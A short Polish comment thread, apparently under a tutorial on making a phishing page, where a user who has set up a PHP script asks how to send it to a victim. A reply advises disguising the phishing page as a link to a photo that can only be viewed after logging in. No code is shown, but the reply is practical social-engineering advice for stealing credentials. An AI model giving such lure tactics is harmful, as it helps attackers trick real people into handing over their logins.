    • Czy utworzyłeś poprawnie skrypt php? Odsyłam do filmiku, jeśli nie proszę ponownie pytać.

  55. Dzięki wielkie :P Teraz się zastanawiam jak komuś to przesłać ;/ Albo jak można to przesłać ?

    • Często strony phishingowe są modyfikowane tak , aby wyglądały jak prowadzące do zdjęcia, które żeby móc zobaczyć trzeba się zalogować…


× jeden = 9